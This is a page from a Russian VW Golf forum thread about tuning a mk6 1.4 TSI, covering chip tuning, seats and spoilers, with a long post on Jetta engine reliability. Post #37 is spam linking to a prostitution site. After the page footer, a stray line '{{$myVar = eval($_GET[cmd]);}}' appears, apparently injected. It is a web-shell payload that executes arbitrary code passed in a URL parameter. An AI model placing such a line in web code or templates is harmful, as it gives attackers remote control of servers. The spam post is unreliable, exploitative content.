+ Ответить в теме
Страница 4 из 4 ПерваяПервая ... 2 3 4
Показано с 31 по 38 из 38

Тема: mk6 trend... sport:)


  1. #31
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    newb1e, время пока детское( уже знаю где что улучшить, чтобы поехать быстрее, думаю этим и буду заниматься до зимы потихоньку настраивать, плюс ожидается чип, после которого надеюсь снять еще несколько десяток секунд. я бы хотел к вам присоединиться гонять, но не смогу регулярно выступать, тк гоняюсь только как хобби и не по расписанию. но в следующем году если машину нормально подготовлю, то думаю запишусь:) а так давайте на трек дни в мячек вместе кататься, я только за! а то сколько там не ездил, одни японцы, феррари, порше и лотусы пуляют, где гольфы?? :D

    ™B®embo™, спасибо дружище, не без твоей помощи! :)

    ~13~, думал про спойлеры и от гти, и от р-ки, перед и зад поменять, но в итоге бюджет получается недетский!:) решил с внешним видом ничего не делать больше, коплю на кресла с боковой поддержкой и на чип.

  2. #32
    GTI-Racing ~13~ will become famous soon enough Аватар для ~13~
    Регистрация
    25.12.2011
    Откуда
    13 район
    Машина
    mk6
    Сообщений
    556
    Ну тогда салон от гтд надо ставить, под серый гольф будет просто великолепно. Апро Спойлер и решетку от гтд я бы все таки подумал)
    GIAC st.1+*k&n drop in air filter*h&r monotube coilovers*h&r anti roll sway bars 28/24*bridgestone adrenalin re02*hawk cp*motul x-lite/5.1*denso tough*OEM+

  3. #33
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62
    13, о вот граммотный совет не все советуют смотреть на gtd :) если как-то удасться их найти по приемлимой цене, было бы круто. а седухи хочу рекаро, есть родные от гольфа аналоги рекаро, просто обтянуты под гольф, но ценник тоже заоблачный, если только мониторить форумы, чтобы кто-нить бу продал, но мне не попадались пока предложения...

  4. #34
    GTI-Racing ~13~ will become famous soon enough Аватар для ~13~
    Регистрация
    25.12.2011
    Откуда
    13 район
    Машина
    mk6
    Сообщений
    556
    Цитата Сообщение от teho Посмотреть сообщение
    13, о вот граммотный совет не все советуют смотреть на gtd :) если как-то удасться их найти по приемлимой цене, было бы круто. а седухи хочу рекаро, есть родные от гольфа аналоги рекаро, просто обтянуты под гольф, но ценник тоже заоблачный, если только мониторить форумы, чтобы кто-нить бу продал, но мне не попадались пока предложения...
    На гольф клубе есть чувак с Украины, салон от гтд продал за 1300$. И походу может еще намутить. Вспоминаю ник напишу.
    GIAC st.1+*k&n drop in air filter*h&r monotube coilovers*h&r anti roll sway bars 28/24*bridgestone adrenalin re02*hawk cp*motul x-lite/5.1*denso tough*OEM+

  5. #35
    GTI-Racing Phobos is on a distinguished road Аватар для Phobos
    Регистрация
    15.01.2012
    Откуда
    Нижний Новгород
    Машина
    VW GTI 6
    Сообщений
    230
    Цитата Сообщение от teho Посмотреть сообщение
    newb1e, время пока детское( уже знаю где что улучшить, чтобы поехать быстрее, думаю этим и буду заниматься до зимы потихоньку настраивать, плюс ожидается чип, после которого надеюсь снять еще несколько десяток секунд. я бы хотел к вам присоединиться гонять, но не смогу регулярно выступать, тк гоняюсь только как хобби и не по расписанию. но в следующем году если машину нормально подготовлю, то думаю запишусь:) а так давайте на трек дни в мячек вместе кататься, я только за! а то сколько там не ездил, одни японцы, феррари, порше и лотусы пуляют, где гольфы?? :D

    ™B®embo™, спасибо дружище, не без твоей помощи! :)

    ~13~, думал про спойлеры и от гти, и от р-ки, перед и зад поменять, но в итоге бюджет получается недетский!:) решил с внешним видом ничего не делать больше, коплю на кресла с боковой поддержкой и на чип.
    Как ни крути из 1.4 tsi (который без компрессора) не сделать гти или подобие, я бы на твоем месте взял бы гти 6 если финансы позволяют, сам хочу, но финансов нет.

  6. #36
    GTI-Racing teho is on a distinguished road Аватар для teho
    Регистрация
    17.07.2011
    Откуда
    Москва, ЦАО
    Машина
    golf 6 1.4 BSR
    Сообщений
    62


    от тапок текут слюни до сих пор, огромное спасибо Роме!

    из плюсов теперь чип - BSR, в итоге имеем 148 лс и по ощущениям 2-х литровый двигатель под капотом. в первый день после чипа думал, что машину другую купил.
    теперь есть толк от выхлопной системы и холодного впуска, чипа очень не хватало, честно говоря не знаю как я до ездил. расход почти на прежнем уровне и все-таки холодный двигатель выше 2-х тысяч не крутит, чего я боялся зимой.

    + стабы h&r, теперь из кресла вываливаться начал гы.

    на очереди роторы с дырочками вперед вместо стоковых от р-ки.
    Последний раз редактировалось teho; 21.03.2013 в 08:23.

  7. #37
    GTI-Racing askoldovd is on a distinguished road Аватар для askoldovd
    Регистрация
    11.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    559
    Женщины, любящие и умеющие удовлетворять мужчину,
    во все времена пользовались спросом у сильного пола.
    Были времена, когда девочек даже обучали этому ремеслу
    в специальных школах. Сейчас, конечно, таких заведений
    уже нет, но желание мужчин получить удовольствие
    http://top-individualki.info/whores_lesbians

  8. #38
    Новичок FedorPorter is on a distinguished road Аватар для FedorPorter
    Регистрация
    21.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    139
    Шестое поколение VW Jetta для российского рынка представлено несколькими бензиновыми двигателями, ниже указаны их основные достоинства и недостатки:
    1) 1.4 CAXA tsi — турбированный двигатель, который развивает 122 л.с. и 200 н*м., причем полка максимального крутящего момента растянута с 1500 до 4000 оборотов., автомобиль приятно и достаточно динамично разгоняется уже с самых низких оборотов. Чип-тюнинг позволяет без снижения ресурса увеличить мощность минимум на 15-20%. В своём классе Джетта с таким мотором признана одним из самых динамичных и экономичных автомобилей.
    Двигатели серии TSI бывают как надежными, так и достаточно проблемными, в зависимости от модели и года выпуска, так как VAG периодически признавал недостатки и вносил изменения в конструкцию двигателей. Фактически 1.4 CAXA — самый надежный двигатель из серии TSI и Джетту нужно брать именно с таким мотором. При своевременной замене масла и заправке нормального АИ-95 1.4 CAXA ходит долго, без проблем с поршневой группой и турбиной (минус — цепь, служит она в среднем 120-150 тыс. км), при этом тяга значительно лучше любого атмосферного двигателя в С классе.
    2) 1.6 CFNA — атмосферный двигатель мощностью 105 л.с. и 155 н*м, который VAG максимально удешевил при его создании. Этот же двигатель с первых дней устанавливается на Поло Седан. Именно с этим мотором, а не с TSI 1.4 CAXA, в основном возникают неполадки. Самый распространенный врожденный дефект 1.6 CFNA — стук на холодном двигателе, который на некоторых моторах переходит в стук на горячем моторе и приводит к последующему ремонту или замене двигателя. Стук вызван слишком короткой юбкой поршня, что приводит к перекладке поршня. Данная проблема временно устраняется путем гарантийной бесплатной замены поршней на модернизированные. Также к минусам данного двигателя относятся ролики китайско-турецкого происхождения, которые на многих двигателях требуют замены при пробеге 30-60 тыс. км, как и помпа, которая также имеет небольшой ресурс из-за дешевых комплектующих. 1.6 CFNA рассчитан минимум под АИ-95, а лучше АИ-98. Из-за убогой конструкции выпуска и удешевленной конструкции самого двигателя, цепного привода ГРМ (цепь ходит в среднем 120-150 тыс. км.) мотор работает громко, особенно это заметно после 3 тыс. оборотов. Несмотря на кучу недостатков, при своевременном и правильном обслуживании этот мотор имеет ресурс минимум 200 тыс. км. Версия двигателя мощностью 85 л.с. называется CFNB и отличается от CFNA только прошивкой, и благодаря чип-тюнингу все ограничения мощности легко снимаются.
    Плюс этого двигателя — на вторичном рынке, благодаря хорошей репутации атмосферных моторов VAG предыдущих поколений, Джетта с мотором 1.6 CFNA более ликвидна, чем с двигателем серии TSI.

+ Ответить в теме
Страница 4 из 4 ПерваяПервая ... 2 3 4

Похожие темы

  1. Продам резину michelin pilot sport 2 и nankang ns2 ultra sport
    от Александр Туров в разделе Шины/диски
    Ответов: 11
    Последнее сообщение: 07.04.2015, 23:12
  2. Vag Sport mk4
    от ingektor в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 09.12.2013, 13:27
  3. СИДУХИ VAG SPORT
    от ALEX R32 в разделе Покупка и продажа запчастей
    Ответов: 4
    Последнее сообщение: 21.11.2013, 10:02
  4. VAG SPORT
    от ALEX R32 в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 12.11.2013, 04:01
  5. Bilstein B6 Sport
    от Вадимыч в разделе Тюнинг
    Ответов: 0
    Последнее сообщение: 16.08.2012, 14:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}